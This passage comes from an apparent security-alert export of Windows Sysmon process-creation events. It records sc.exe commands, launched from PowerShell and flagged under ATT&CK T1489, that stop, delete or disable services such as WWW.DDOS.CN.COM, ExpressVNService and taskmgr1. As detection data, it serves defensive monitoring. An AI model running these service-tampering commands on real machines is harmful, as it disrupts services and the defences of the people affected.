Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.056",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.561 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010758f1900} +ProcessId: 7212 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WWW.DDOS.CN.COM +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.563317500Z"",""eventRecordID"":""2162"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.561\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010758f1900}\r\nProcessId: 7212\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WWW.DDOS.CN.COM\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.561"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010758f1900}"",""processId"":""7212"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WWW.DDOS.CN.COM"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.025",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.530 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010e48d1900} +ProcessId: 5020 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete 
ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.533641500Z"",""eventRecordID"":""2160"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.530\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010e48d1900}\r\nProcessId: 5020\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete ExpressVNService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.530"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010e48d1900}"",""processId"":""5020"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:04.009",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.517 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-00101b8d1900} +ProcessId: 5448 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.519628900Z"",""eventRecordID"":""2159"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.517\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-00101b8d1900}\r\nProcessId: 5448\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService\r\nCurrentDirectory: C:\\Users\\John 
Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.517"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-00101b8d1900}"",""processId"":""5448"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.963",8,"ATT&CK T1489: Stop Windows Service","""Process 
Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.469 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010c28a1900} +ProcessId: 6300 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WebServers +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WebServers",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.474004600Z"",""eventRecordID"":""2156"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.469\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-0010c28a1900}\r\nProcessId: 6300\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft 
Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WebServers\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.469"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-0010c28a1900}"",""processId"":""6300"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WebServers"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.915",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.429 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-001064881900} +ProcessId: 6588 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop taskmgr1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
taskmgr1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.431419000Z"",""eventRecordID"":""2153"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.429\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-001064881900}\r\nProcessId: 6588\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:35.429"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-001064881900}"",""processId"":""6588"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop taskmgr1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.901",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.416 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-00109a871900} +ProcessId: 5960 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config taskmgr1 Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config taskmgr1 Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:35.419591100Z"",""eventRecordID"":""2152"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:35.416\r\nProcessGuid: {df9fc3d3-b35f-5ecf-0000-00109a871900}\r\nProcessId: 5960\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config taskmgr1 Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:49:35.416"",""processGuid"":""{df9fc3d3-b35f-5ecf-0000-00109a871900}"",""processId"":""5960"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config taskmgr1 Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:03.868",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:35.392 +ProcessGuid: {df9fc3d3-b35f-5ecf-0000-001005861900} +ProcessId: 3308 +Image: C:\Windows\System32\sc.exe +FileVersion: 